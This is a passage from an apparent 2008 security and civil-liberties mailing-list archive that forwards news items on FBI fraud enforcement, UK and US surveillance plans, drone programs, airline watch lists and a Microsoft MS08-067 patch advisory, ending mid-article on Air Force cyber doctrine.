white-collar crime, while we initiated fewer cases over all, we targeted the areas where we could have the biggest impact. We focused on multimillion-dollar corporate fraud, where we could make arrests but also recover money for the fraud victims.? But Justice Department data, which include cases from other agencies, like the Secret Service and Postal Service, illustrate the impact. Prosecutions of frauds against financial institutions dropped 48 percent from 2000 to 2007, insurance fraud cases plummeted 75 percent, and securities fraud cases dropped 17 percent. Statistics from a research group at Syracuse University, the Transactional Records Access Clearinghouse, using somewhat different methodology and looking only at the F.B.I., show an even steeper decline of nearly 50 percent in overall white-collar crime prosecutions in the same period. In addition to the investigations into Fannie Mae and Freddie Mac, the F.B.I. is carrying out investigations of American International Group and Lehman Brothers, and it has opened more than 1,500 other mortgage- related investigations. Some F.B.I. officials worry privately that the trillion-dollar federal bailout of the financial industry may itself become a problem because it contains inadequate controls to deter fraud. No one has suggested that a quicker response would have averted the mortgage meltdown, but some officials said a faster reaction might have deterred more of the early schemes that seized on loose federal lending regulations. ?They were very late to the game,? Representative Zoe Lofgren, a California Democrat who has quarreled with the F.B.I. over its financing priorities, said of the bureau?s response to the mortgage crisis. ?They were not on top of this, and they?re just now starting to really do something.? Republicans and Democrats in Congress are pushing for a more aggressive response by the F.B.I. Representatives Mark S. Kirk, an Illinois Republican who sits on the House appropriations committee, and Chris P. Carney, a Pennsylvania Democrat, called on Congress to triple the F.B.I.?s financing for financial crimes investigations. ?To fix our system and prevent a repeat of the events we now see,? they wrote in a letter this month to Robert S. Mueller III, the F.B.I. director, ?we have got to set an example by bringing the full might of federal law enforcement against the people who illegally profited or destroyed companies at the expense of our country.? In public, Mr. Mueller has said that the bureau is doing more with less, when it comes to criminal prosecutions. And Justice Department officials have repeatedly asserted the administration?s commitment to fight violent and white-collar crime even as they have not provided the bureau additional resources. But current and former officials say Mr. Mueller has lost a behind-the- scenes battle with the Justice Department and the Office of Management and Budget to replenish the criminal ranks. Interviews and internal records show that F.B.I. officials realized the growing danger posed by financial fraud in the housing market beginning in 2003 and 2004 but were rebuffed by the Justice Department and the budget office in their efforts to acquire more resources. ?The administration?s top priority since the 9/11 attacks has been counterterrorism,? Peter Carr, a Justice Department spokesman, said. ?In part, that?s reflected by a significant investment of resources at the F.B.I. to answer the call from Congress and the American public to become a domestic intelligence agency in addition to a law enforcement agency.? From 2001 to 2007, the F.B.I. sought an increase of more than 1,100 agents for criminal investigations apart from national security. Instead, it suffered a decrease of 132 agents, according to internal F.B.I. figures obtained by The New York Times. During these years, the bureau asked for an increase of $800 million, but received only $50 million more. In the 2007 budget cycle, the F.B.I. obtained money for a total of one new agent for criminal investigations. In 2004, one senior F.B.I. official, Chris Swecker, warned publicly that a flood of fraudulent mortgage deals had the potential to become ?an epidemic.? Yet the next year, as public warnings about fraud in the subprime lending markets began to approach their height, the F.B.I. had the equivalent of only 15 full-time agents devoted to mortgage fraud out of a total of some 13,000 agents in the bureau. That number has grown to 177 agents, who have opened 1,522 cases. But the staffing level is still hundreds of agents below the levels seen in the 1980s during the savings and loan crisis. F.B.I. officials said they had had no choice but to make the cuts in the criminal division, which they said were necessary to expand the bureau?s national security effort, particularly in the wake of criticism of the bureau?s performance in failing to detect the Sept. 11 plot. In white-collar crime, they said the bureau has given up only lower- level cases of marginal significance that might have never been prosecuted anyway. They say they have focused the available criminal resources on public corruption and other difficult crime issues in which the F.B.I. can make a unique contribution. ?We only had a finite number of white-collar crime agents available to address the threat that mortgage fraud posed,? said Joseph Ford, who retired from the F.B.I. this year and once served as its chief financial officer. The Justice Department is relying more than ever on the state and local authorities to pick up the slack through joint task forces. And private investigators say that companies victimized by fraud are turning to them in increasing numbers because they are unable to attract much attention from the F.B.I. anymore. In some instances, private investigative and accounting firms are now collecting evidence, taking witness statements and even testifying before grand juries, in effect preparing courtroom-ready prosecutions they can take to the F.B.I. or local authorities. ?Anytime you bring to the F.B.I. a case that is thoroughly investigated and reduce the amount of work for investigators, the likelihood is that they will take the case and present it for prosecution,? said Alton Sizemore, a former F.B.I. agent who is a fraud examiner for Forensic Strategic Solutions in Birmingham, Ala. One American company facing extortion demands last year from a computer hacker used private investigators from the Kroll firm to do much of the legwork in the case as the F.B.I. monitored and directed the situation behind the scenes, said Daniel Karson, executive managing director for Kroll. The private investigators even went undercover and set up a sting operation that led them to Germany, where the authorities made an arrest. Mr. Karson said the F.B.I. no longer had the resources to take on such lower-level cases by itself. ?When you come in with a garden variety, plain vanilla crime, you may have to stand in the queue,? he said. Some critics question whether the shift indicates not just a lack of resources, but a lack of interest by the Bush administration. After the collapse of Enron in 2002, the Justice Department moved aggressively against corporate fraud ? too aggressively, in the view of some people within the administration. It set up a national task force to tackle the problem, garnered hundreds of convictions at companies like WorldCom, Adelphia and Enron, and forced the closure of Arthur Andersen, the accounting firm, for its role in the Enron collapse. But several former law enforcement officials said in interviews that senior administration officials, particularly at the White House and the Treasury Department, had made clear to them that they were concerned the Justice Department and the F.B.I. were taking an antibusiness attitude that could chill corporate risk taking. Justice Department officials said political pressures had never influenced the way prosecutors approached corporate cases. But the department?s approach has become noticeably more tempered in the last several years. This spring and summer, as public concerns about the subprime mortgage crisis were growing, Attorney General Michael B. Mukasey rejected repeated calls for the creation of a national task force like the one used after the Enron collapse. The attorney general likened the problem to ?white-collar street-crime? that could best be handled by individual United States attorneys? offices. In the last four years, the Justice Department has scored fewer of the big-name prosecutions that marked President Bush?s first term in office. Even when investigations have pointed to corporate wrongdoing, the Justice Department has agreed, in dozens of cases in the last four years, to ?deferred prosecutions" that allowed companies to pay fines in order to avoid criminal prosecution. Paul J. McNulty, who served as deputy attorney general under Alberto R. Gonzales, said the complexity of white-collar investigations and the shortage of investigators had driven a decline in high-profile cases. ?There?s no question that the department has been stretched thin when it comes to resources generally, and that has affected white-collar enforcement in a variety of areas,? Mr. McNulty said in an interview. ?What happened is that the first years after the Enron collapse, there were some very high profile, noticeable cases ? the low-hanging fruit ? that gave Justice the opportunity to rack up some very big wins,? he said. ?Those cases played themselves out and it became tougher to find those big cases.? From rforno at infowarrior.org Sun Oct 19 23:49:45 2008 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 19 Oct 2008 19:49:45 -0400 Subject: [Infowarrior] - FUD Alert: Spies Worry Hackers Could Fuel Financial Panic Message-ID: <9BFA8691-92DD-4DDB-83F0-B7DDB31AE63E@infowarrior.org> Spies Worry Hackers Could Fuel Financial Panic By Noah Shachtman EmailOctober 17, 2008 | 12:00:00 PMCategories: Info War http://blog.wired.com/defense/2008/10/spies-worry-hac.html We all laughed and pointed our fingers at Chuck Norris, when he floated the idea earlier this week that the current crisis on Wall Street is the result of "economic terrorism." Some of the nation's counterintelligence officials aren't smiling, however. No, they don't believe Chuck's thesis about some mysterious "manipulation of the marketplace" that's causing us all to lose our life savings. But some spooks are concerned that hackers could send already-frazzled "stock markets into one more panicked frenzy, by covertly manipulating data and spreading false information," Shane Harris reports in the latest edition of National Journal. As evidence, spooks point to the recent hits to Apple's and United Airlines' stock prices, based on misinformation. And they cite the example of Jerome Kerviel, a hacker and trader at the French financial firm Societe Generale. In January, Kerviel caused a worldwide financial panic, basically by himself. First, he made all kinds of bogus, risky trades. Then Kerviel hacked his employer's networks, to cover up his tracks. He "disabled an automatic-alert mechanism that should have flagged his reckless transactions. And he stole passwords that gave him access to accounting records, which he falsified to cover his tracks. He even constructed fake e-mails about fictitious trades to make his activities seem real." The bank's losses "totaled more than $7 billion." But, more importantly, it started a stampede in the futures market, and a dip in the world's stock markets. It got so bad that Federal Reserve Board Chairman Ben Bernanke had to make an emergency cut of the interest rate that the Fed charges banks for overnight loans. Last month, hackers in another case were sentenced to two years in prison for rigging stock prices. Is the intel officers' worry -- that a Kerviel-on-steroids could trigger an even wider panic -- legit? Well, these spooks are professional worrywarts. They're paid to come up with nightmare scenarios -- and think of ways to counter it. Hell, some of 'em are even biting their nails about terrorists in World of Warcraft. But this seems a little more legit. Even if it does sound vaguely reminiscent of a Chuck Norris freak-out. http://blog.wired.com/defense/2008/10/spies-worry-hac.html From rforno at infowarrior.org Mon Oct 20 01:02:23 2008 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 19 Oct 2008 21:02:23 -0400 Subject: [Infowarrior] - UK: Passport required to buy cellphone Message-ID: <627EC0B3-4BAD-4EFA-8AC6-FB7BE0DA2138@infowarrior.org> (Another stupid security kibuki theater item - they assume that 'terrorists' will ONLY use a cellphone. --rf) Passports will be needed to buy mobile phones A British passport David Leppard http://www.timesonline.co.uk/tol/news/politics/article4969312.ece Everyone who buys a mobile telephone will be forced to register their identity on a national database under government plans to extend massively the powers of state surveillance. Phone buyers would have to present a passport or other official form of identification at the point of purchase. Privacy campaigners fear it marks the latest government move to create a surveillance society. A compulsory national register for the owners of all 72m mobile phones in Britain would be part of a much bigger database to combat terrorism and crime. Whitehall officials have raised the idea of a register containing the names and addresses of everyone who buys a phone in recent talks with Vodafone and other telephone companies, insiders say. The move is targeted at monitoring the owners of Britain?s estimated 40m prepaid mobile phones. They can be purchased with cash by customers who do not wish to give their names, addresses or credit card details. The pay-as-you-go phones are popular with criminals and terrorists because their anonymity shields their activities from the authorities. But they are also used by thousands of law-abiding citizens who wish to communicate in private. The move aims to close a loophole in plans being drawn up by GCHQ, the government?s eavesdropping centre in Cheltenham, to create a huge database to monitor and store the internet browsing habits, e-mail and telephone records of everyone in Britain. The ?Big Brother? database would have limited value to police and MI5 if it did not store details of the ownership of more than half the mobile phones in the country. Contingency planning for such a move is already thought to be under way at Vodafone, where 72% of its 18.5m UK customers use pay-as-you-go. The office of Richard Thomas, the information commissioner, said it anticipated that a compulsory mobile phone register would be unveiled as part of a law which ministers would announce next year. ?With regards to the database that would contain details of all mobile users, including pay-as-you-go, we would expect that this information would be included in the database proposed in the draft Communications Data Bill,? a spokeswoman said. Simon Davies, of Privacy International, said he understood that several mobile phone firms had discussed the proposed database in talks with government officials. As The Sunday Times revealed earlier this month, GCHQ has already been provided with up to ?1 billion to work on the pilot stage of the Big Brother database, which will see thousands of ?black boxes? installed on communications lines provided by Vodafone and BT as part of a pilot interception programme. The proposals have sparked a fierce backlash inside Whitehall. Senior officials in the Home Office have privately warned that the database scheme is impractical, disproportionate and potentially unlawful. The revolt last week forced Jacqui Smith, the home secretary, to delay announcing plans for the database until next year. From rforno at infowarrior.org Mon Oct 20 02:35:45 2008 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 19 Oct 2008 22:35:45 -0400 Subject: [Infowarrior] - DARPA Contract Hints at Advanced Video Spying Message-ID: <475252EC-138F-4A72-94C6-40B4D744F02A@infowarrior.org> DARPA Contract Description Hints at Advanced Video Spying By Walter Pincus Monday, October 20, 2008; A13 http://www.washingtonpost.com/wp-dyn/content/article/2008/10/19/AR2008101901572_pf.html Real-time streaming video of Iraqi and Afghan battle areas taken from thousands of feet in the air can follow actions of people on the ground as they dig, shake hands, exchange objects and kiss each other goodbye. The video is sent from unmanned and manned aircraft to intelligence analysts at ground stations in the United States and abroad. They watch video in real time of people getting in and out of cars, loading trunks, dropping things or picking them up. They can even see vehicles accelerate, slow down, move together or make U-turns. "The dynamics of an urban insurgency have resulted in a rapid increase in the number of activities visible in the video field of view," according to the Defense Advanced Research Projects Agency. Although the exploits of the Predator, the Global Hawk and other airborne collectors of information have been widely publicized, there are few authoritative descriptions of what they can see on the ground. But some insights into the capabilities of the Predator and other aircraft can be drawn from a DARPA paper that describes the tasks of a contractor that will develop a method of indexing and rapidly finding video from archived aerial surveillance tapes collected over past years. "The U.S. military and intelligence communities have an ever increasing need to monitor live video feeds and search large volumes of archived video data for activities of interest due to the rapid growth in development and fielding of motion video systems," according to the DARPA paper, which was written in March but released last month. Last month, Kitware, a small software company with offices in New York and North Carolina, teamed up with 19 other companies and universities and won the $6.7 million first phase of the DARPA contract, which is not expected to be completed before 2011. During the Cold War, satellites and aircraft took still pictures that intelligence analysts reviewed one frame at a time to identify the locations of missile silos, airplane hangars, submarine pens and factories, said John Pike, director of GlobalSecurity.org, an expert in space and intelligence matters. "Now with new full-motion video intelligence techniques, we are looking at people and their behavior in public," he said. The resolution capability of the video systems ranges from four inches to a foot, depending on the collector and environmental conditions at the time, according to the DARPA paper. The video itself is also shaped by the angle to the ground from which it is shot, although there are 3-D capabilities that allow viewers on the ground to manipulate videos of objects so they can see them from different vantage points. Systems also exist that allow tracking, moving-target detection of objects under forest or other cover and determination of exact geographic location. Development is underway of systems that allow recognition of faces and gait -- in other words, human identification. Currently, because there are so many activities or objects to be watched for hints of suspicious behavior, "more analysts . . . watch the same, real-time video stream simultaneously," according to DARPA. "If any of the given activities or objects are spotted, the analyst issues an alert to the proper authorities." Future collection systems are expected to provide even more imagery, cover areas greater than 16 square miles and make it more difficult "for a limited number of analysts to effectively monitor and scrutinize all potential activities within the streaming field of view," DARPA wrote. Today's volume of intelligence data, beyond just streaming video, already "makes it very difficult to detect specific events in real time and too time intensive to search archived video," the DARPA paper said. The effort underway is designed to find a way to index similar activity, then search and retrieve it from archives. The proposed new system should be able to analyze real-time streaming video as it is received in a ground station and match it on command to archived video from more than one video library. One notion, described by DARPA, would be that an analyst with a standing alert to watch for U-turning cars could employ the new system to quickly match a real-time event with archived clips of cars making such turns before an attack. National security and intelligence reporter Walter Pincus pores over the speeches, reports, transcripts and other documents that flood Washington and every week uncovers the fine print that rarely makes headlines -- but should. If you have any items that fit the bill, please send them to fineprint at washpost.com. From rforno at infowarrior.org Wed Oct 22 03:32:46 2008 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 21 Oct 2008 23:32:46 -0400 Subject: [Infowarrior] - DPP chief Sir Ken Macdonald attacks Big Brother state surveillance Message-ID: <3271113E-5112-4CF4-988C-98A080F8D69B@infowarrior.org> From Times Online October 21, 2008 DPP chief Sir Ken Macdonald attacks Big Brother state surveillance Frances Gibb, Legal Editor http://www.timesonline.co.uk/tol/news/uk/article4984788.ece The Director of Public Prosecutions has given a warning of the dangers of plans for a massive expansion of ?Big Brother? state surveillance and of the growth of a ?security state?. Sir Ken Macdonald, who heads the Crown Prosecution Service, said that the ?enormous powers of access to information? that technology had given the state should be used with great care. He told an audience in London last night: ?We need to take very great care not to fall into a way of life in which freedom?s back is broken by the relentless pressure of a security state.? Technology, he added, was of critical importance to the struggle against serious crime and used wisely, could protect society. It gave ?the state enormous powers to access to knowledge and information about each one of us. And the ability to collect and store it at will; every second of every day, in everything we do.? But Sir Ken, giving the inaugural Crown Prosecution Service lecture in London, called for ?level-headedness and legislative restraint?. He said: ?We need to understand that it is in the nature of state power that decisions taken in the next few months and years about how the state may use these powers, and to what extent are likely to be irreversible. ?They will be with us forever,? he said. ?And they in turn will be built upon on. ?So we should take very great care to imagine the world we are creating before we build it. We might end up living with something we can?t bear.? Sir Ken, who steps down at the end of this month after five years as Director of Public Prosecutions, did not refer directly to the latest Government surveillance plans. But his comments will be taken to mean the Home Secretary Jacqui Smith's plans for a new ?super database? that will allow Government officials to monitor people?s every online move. The Government is examining ways to collect and store records of phone calls, e-mails and internet traffic. Without the right to monitor the flow of internet messaging, the police and security services would have to consider a ?massive expansion of surveillance?, she said. A three-month consultation is planned for the new year. Sir Ken, who described his period as DPP as a ?relentless prosecutorial struggle against terrorism?, acknowledged that the country faced ?very significant risks.? But he said he regarded people?s rights as priceless. The best way to face down security threats was to strengthen our institutions, rather than degrade them. ?Our struggle has been absolutely grounded in due process,? he added. ?We all know that this has worked. Our conviction rates for terrorism cases is in excess of 90 per cent ? unmatched in the fair trial world.? He reminded his audience that when he took up his appointment, ?some questioned my suitability on the grounds that I had, in my career at the Bar, defended terrorists of almost every hue.? But he had made clear that his period of DPP and the ?relentless struggle against terrorism? would be grounded in respect for historical norms and ?for our liberal constitution?. He added: ?So we have been absolutely right to resist, whenever they have been suggested, special courts, vetted judges and all the other paraphernalia of paranoia.? Earlier in his speech Sir Ken also gave warning about turning back the clock by giving back to the police the job of charging suspects. There have been recent calls for a return to police charging on the ground that the role of the prosecutor in the process added to police red tape. But the CPS?s role in charging, which was assumed under his period of office, made it ?more likely that investigations will comply with the rules and that occasional abuses of police power will be avoided. ?We make it less likely that the state will bring cases which shouldn?t be brought and which are not justified by the evidence.? From rforno at infowarrior.org Wed Oct 22 12:57:26 2008 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 22 Oct 2008 08:57:26 -0400 Subject: [Infowarrior] - AOL To Nuke Users' Content On Halloween Message-ID: <679D7005-AC90-42DB-A2F0-01013EB6B313@infowarrior.org> AOL To Nuke Users' Content On Halloween from the bye-bye dept http://techdirt.com/articles/20081021/0206432604.shtml theodp writes "Blaming an unquantified decline in usage, AOL has notified users it's decided the best thing to do is delete all of their blogs and files on October 31st. Want to save that precious blog of yours? AOL not-so-helpfully suggests: 'The quickest and easiest way to do this is by copying and pasting your content into a word processing document such as Microsoft Word, Notepad or even into an email and mailing it back to yourself. If you have any images we suggest you save them separately by right clicking on the image, choosing "Save Picture As" and allocate the drive on your PC where you would like to save them to.' Gee, thanks. And don't get too smug, Google users - the search giant has put its users on notice that Google Page Creator will be a thing of the past by year-end, although details of the transition have yet to be provided." These are just a few more in a long line of attempts by big companies to enable user generated content without much of a plan. With so much attention in the space, plenty of large companies (including Yahoo and Microsoft, in addition to Google and AOL mentioned here) rushed out various tools for users, but forgot to explain to them why they might want to use them. For the most part, they just launched them and figured users would show up willingly. It turns out that, even if you're a big company, it's not so easy to get user adoption if you don't offer anything particularly special compared to what's already out there. From rforno at infowarrior.org Thu Oct 23 11:55:15 2008 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 23 Oct 2008 07:55:15 -0400 Subject: [Infowarrior] - TSA responds to Schneier Message-ID: <8CBB203A-F784-4E90-A919-1582B62673B1@infowarrior.org> (It's always refreshing to see Bruce and others call an educated "bs" on purportedly-good security......-rf) Kip Hawley Responds to My Airport Security Antics http://www.schneier.com/blog/archives/2008/10/kip_hawley_resp.html Original Atlantic article: http://www.theatlantic.com/doc/print/200811/airport-security From rforno at infowarrior.org Thu Oct 23 17:50:23 2008 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 23 Oct 2008 13:50:23 -0400 Subject: [Infowarrior] - USAF creates new pilot programs for drones Message-ID: <2F2AB987-9986-4DC8-990B-D66A633040F9@infowarrior.org> Air Force creates new pilot programs for drones http://news.yahoo.com/s/ap/20081023/ap_on_go_ca_st_pe/air_force_drone_pilots By LOLITA C. BALDOR, Associated Press Writer Lolita C. Baldor, Associated Press Writer ? Thu Oct 23, 7:47 am ET In this image provided by the U.S. Air Force, Capt. Richard Koll, left, and AP ? In this image provided by the U.S. Air Force, Capt. Richard Koll, left, and Airman 1st Class Mike Eulo ? WASHINGTON ? Scrambling to meet commanders' insatiable demands for unmanned aircraft, the Air Force is launching two new training programs, including an experimental one that would churn out up to 1,100 desperately needed pilots to fly the drones over Iraq and Afghanistan. As many as 700 Air Force personnel have expressed some interest in the test program, which will create a new brand of pilot for the drones, which are flown by remote control from a base in Nevada. That new drone operator will learn the basics of flying a small manned plane, but will not go through the longer, more rigorous training that their fighter jet brethren receive. A senior Air Force officer told The Associated Press that by the end of September 2011, the goal is to have 50 unmanned combat air patrols operating 24 hours a day, largely over Iraq and Afghanistan. Currently there are 30. To generate the pilots for the increased flights, the Air Force hopes to create separate pilot pipelines for its manned and unmanned aircraft, said Col. Curt Sheldon, assistant to the director of air operations for unmanned aircraft issues. "I don't know that you could ever get (a drone) to everybody who wants one," Sheldon said. "I believe it is virtually insatiable. We are pedaling fast, we are working hard to meet that need." Besides the new test program, Sheldon said the Air Force is planning to shift about 100 manned-aircraft pilots directly from training into jobs flying the drones. The unmanned aircraft are mostly Predators ? hunter-killer planes that fly in the war zone but are operated by pilots sitting at Creech Air Force Base in Nevada. Until now, Unmanned Aerial System (UAS) pilots have had to complete at least one tour of flight duty before moving to the drone jobs. The urgent push for more drone pilots has been spurred by blunt demands from Defense Secretary Robert Gates. He has criticized the Air Force's failure to move more quickly to meet war commanders' needs. And he set up a task force in April to find more innovative ways to get the aircraft to the battlefield more quickly. Predators are playing a crucial role on the battlefields in Iraq and Afghanistan, providing real-time surveillance video to troops on the ground, targeting and firing Hellfire anti-tank missiles at militants, and homing in on enemy efforts to plant roadside bombs. Earlier this year, for example, a Predator ? probably one operated by the CIA ? fired on a suspected terrorist safehouse in Pakistan's north Waziristan region, killing Abu Laith al-Libi, a key al-Qaida leader. To date, the Air Force has been using experienced fighter pilots to operate the drones. But as the demand has skyrocketed, the service has struggled to find enough pilots to fill both the manned and unmanned jobs. "The pipeline that produces manned operators is full," said Sheldon. "We're pushing them through there as fast as we can." The two new programs are just beginning. Two pilots have just been selected to go directly from training to the unmanned program. Once there they will get an additional four to six weeks of schooling on how to operate the drone, how the weapons systems work, and how to coordinate with troops on the ground. Eventually that will expand, sending as many as 100 a year through the drone program for the next three years. Meanwhile, the test program for non-pilots is aimed at Air Force captains who have four to six years of experience, but no flight training. Their schooling would take up to nine months, and they would not have to meet all of the more stringent standards that jet fighter pilots must. Unmanned pilots, for example, will not have to meet certain height or vision requirements, and also would not be eliminated due to physical conditions that might prevent them from flying at high altitudes. In pressing the Air Force to be more aggressive getting drones to the war, Gates hinted at such a plan, calling for "bold" thinking. "All this may require rethinking long-standing service assumptions and priorities about which missions require certified pilots and which do not," Gates said in April. Under the fledgling program, the drone pilots would go to Pueblo, Colo., for about six weeks of flight training. Sheldon said they would learn to fly a small Mitsubishi single-engine propeller plane, probably do a solo flight and get a handle on basic aircraft controls. They would also train on flight simulators, and then go through the unmanned aircraft training. Officials quickly reject temptations to compare the drone pilots to video gamers who have a far easier job at their computer screens than pilots sitting in cockpits. An F-16 fighter jet, said Sheldon is easy enough to fly from one spot to another. The harder part, he said, is deploying the weapons. The same is true for the drones. "It's not particularly difficult to fly a (drone) from point A to point B," said Sheldon. "It is challenging to fly it in a combat environment, coordinating with a guy on the ground who wants you to hit a target over here that's got (friendly) folks only 50 meters from it." Air Force captains have until Nov. 3 to apply for the new program. They will be screened and tested, and the first 10 will begin classes Jan. 5. A second class of 10 will begin in April. The test program will also get reviewed by the Federal Aviation Administration in the coming months. Officials could not provide any cost estimates for the new training programs. ___ On the Net: Defense Department: http://www.defenselink.mil From rforno at infowarrior.org Thu Oct 23 18:11:23 2008 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 23 Oct 2008 14:11:23 -0400 Subject: [Infowarrior] - Critical MS RPC Bulletin Message-ID: <682C37DD-7C7C-47EF-B0A7-16A07CF2A111@infowarrior.org> Microsoft Security Bulletin MS08-067 ? Critical Vulnerability in Server Service Could Allow Remote Code Execution (958644) Published: October 23, 2008 Version: 1.0 Executive Summary This security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit. Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter. This security update is rated Critical for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, and rated Important for all supported editions of Windows Vista and Windows Server 2008. For more information, see the subsection, Affected and Non-Affected Software, in this section. The security update addresses the vulnerability by correcting the way that the Server service handles RPC requests. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information. Recommendation. Microsoft recommends that customers apply the update immediately. < - > http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx From rforno at infowarrior.org Fri Oct 24 01:57:46 2008 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 23 Oct 2008 21:57:46 -0400 Subject: [Infowarrior] - Feds to Take Over Airline Watch Lists in 2009 Message-ID: Feds to Take Over Airline Watch Lists in 2009 By Ryan Singel EmailOctober 22, 2008 | 4:16:33 PMCategories: Watchlists http://blog.wired.com/27bstroke6/2008/10/feds-to-take-ov.html U.S. airline passengers will soon have to give their date of birth and gender when buying a plane ticket, as the government prepares to take over terrorist watch list screening starting in early 2009, Department of Homeland Security officials announced Wednesday. Under the so-called "Secure Flight" proposal -- which has been six years and numerous privacy scandals in the making -- airlines will submit travelers' personal information to DHS, which will compare the information against terrorist watch lists and then send the results to the airlines. Previously, airlines have performed the screening autonomously. The government hopes that a centralized checking system will reduce the number of false matches on the list, which have notoriously included senators, nuns and anyone named David Nelson. "Secure Flight is a critical tool that will further improve aviation security and fix the major customer service issue of watch list misidentifications, a frustratingly common occurrence for travelers under the existing airline-based system," said homeland security secretary Michael Chertoff in a press release. Privacy groups gave the program a lukewarm welcome, acknowledging they largely won a five-year battle to scale back the program's ambitions. "What remains to be seen is whether the revisions to Secure Flight will really work," said ACLU legislative counsel Tim Sparapani. "We suspect that although the government will do the vetting now, instead of the airlines, the failure to scrub the watch lists of hundreds of thousands of records of innocent, law-abiding passengers will result in still far too many mistakes and burdens for those travelers whose only crime is that their name is similar to somebody whom the government thinks is suspicious." The airline industry has long been wary of Secure Flight, due to the costs of changing their networks to interact with the government's and the complexity of clearing names with re-booked itineraries or last- minute purchases. Airlines will have to begin sending data to the government at least 72 hours before a flight departs. DHS estimates Secure Flight will cost passengers, the government and the airline industry more than $3 billion over 10 years. Secure Flight's task is not easy, as more than 2 million people fly domestically daily and the program is eventually supposed to take over watch list matching for all inbound and outbound international flights as well. Currently, each airline matches reservation names against lists provided to them by the Transportation Security Administration. The TSA blames airlines for not using good name-matching technology or doing enough to solve false matches against the list. Secure Flight is a far cry from earlier proposals known as CAPPS II, which sought to judge each passenger's potential terrorism potential by looking at government and private databases. Those systems were scrapped as being too complicated and invasive after the airlines and the TSA were caught secretly sharing passenger data. The TSA says it will only hang onto most people's travel records for a week. Records from travelers who look like they match one of the lists will be kept for seven years, and records that seem to be a real match against the list will be kept for 99 years. The TSA will begin testing the system in January 2009, at first in parallel with test airline's current processes. Airlines and travel agents are expected to re-jigger their systems to collect the new personal information, as well as the passenger's Redress number and Known Traveler number, over the next nine months. Travelers who consistently find themselves unable to get a boarding pass without having a long conversation with airline employees can try to get help from DHS's TRIP program. Armed with a I'm-not-the- terrorist-you-are-looking-for-number, passengers should be able to print boarding passes at home or at kiosks under Secure Flight. DHS expects that in the future that people who have been cleared of any terrorism ties by a government background check -- say a pilot or airline mechanic -- could use a Known Traveler number to escape the checks, but that doesn't exist currently. The long delayed program also needs to be cleared by Congress's investigative office the Government Accountability Office, which has repeatedly found the program's privacy protections lacking. Although President Bush said in one of his controversial signing statements that Congress didn't have the right to condition funding for Secure Flight based on a GAO audit, DHS said Wednesday it will wait until the GAO signs off on Secure Flight before testing it. Photo: Ecenerwal/Flickr From rforno at infowarrior.org Fri Oct 24 11:32:52 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 24 Oct 2008 07:32:52 -0400 Subject: [Infowarrior] - US judge to decide what is meant by 'enemy combatant' Message-ID: US judge to decide what is meant by 'enemy combatant' AFP Published: Thursday October 23, 2008 http://rawstory.com/news/afp/US_judge_to_decide_what_is_meant_by_10232008.html A federal judge held a hearing Thursday on the meaning of "enemy combatant," which the US government uses to justify holding suspects indefinitely without charge, as six Guantanamo prisoners were readied for trial. Government and defense lawyers squared off on whether an enemy combatant is someone who participates in or supports terrorism, a crucial question since the six suspects were arrested in Bosnia for alleged links to the Al-Qaeda terror network. One of the detainees allegedly spoke with an Al-Qaeda member by telephone, a charge his lawyers claim has not been substantiated with evidence, while the rest allegedly made plans to travel to Afghanistan in late 2001, after the September 11 attacks. The six suspects have been held at the US naval base at Guantanamo Bay, Cuba, some for almost seven years, without any legal recourse until the US Supreme Court in June ruled that they have the right to challenge their detention in civilian court. Their trials are due to start in November. At the start of the hearing, US District Judge Richard Leon wondered how the Supreme Court arrived at its June ruling without providing a definition for enemy combatant in the first place. Attorney Mark Fleming, who is defending Algerian Lakhdar Boumediene, argued that international law establishes the "relevant standard" for enemy combatant, as somebody who takes "direct participation" in hostilities. He said the United States started "extending the definition" after the September 11, 2001 attacks. Government lawyers responded by saying the term applied to anybody planning to join the combat, and stressed the United States was fighting enemies who did not respect the laws of war. "The petitioners say we captured them too soon," before they could actually engage the United States in battle, the government lawyer added. The judge is expected to issue his definition of enemy combatant on Monday, although he cautioned it still may not resolve the issue, since the term appeared broad in scope. From rforno at infowarrior.org Fri Oct 24 11:39:47 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 24 Oct 2008 07:39:47 -0400 Subject: [Infowarrior] - Book: The Atlas of Cyberspace Message-ID: <9B30EE77-C941-4DEF-A38A-5290DE11E913@infowarrior.org> (via MRunner) http://www.kitchin.org/atlas/index.html The Atlas of Cyberspace, by Martin Dodge and Rob Kitchin, is the first comprehensive book to explore the spatial and visual nature of cyberspace and its infrastructure. It uses a user-friendly, approachable style to examine why cyberspace is being mapped and what new cartographic and visualisation techniques have been employed. Richly illustrated with over 300 full colour images, it comprehensively catalogues 30 years worth of maps that reveal the rich and varied landscapes of cyberspace. The book includes chapters detailing: - mapping Internet infrastructure and traffic flows - mapping the Web - mapping online conversation and community - imagining cyberspace in art, literature, and film Note: Full book is available as free PDF via CCC license: http://www.kitchin.org/atlas/contents.html From rforno at infowarrior.org Sat Oct 25 02:32:29 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 24 Oct 2008 22:32:29 -0400 Subject: [Infowarrior] - AF Wants 'Freedom to Attack' Online Message-ID: <90F08645-DD47-4BB3-869F-2F7118E37F6D@infowarrior.org> Air Force Wants 'Freedom to Attack' Online By Noah Shachtman EmailOctober 24, 2008 | 12:43:00 PMCategories: Info War http://blog.wired.com/defense/2008/10/in-new-doctrine.html Gone are the days when the Air Force pledged to "dominate" cyberspace. Now, the flyboys just want "freedom of action" online. Oh, and the ability to deceive foes, and cyberstrike enemies at will. That's according to a draft document, "Cyberspace Operations -- Air Force 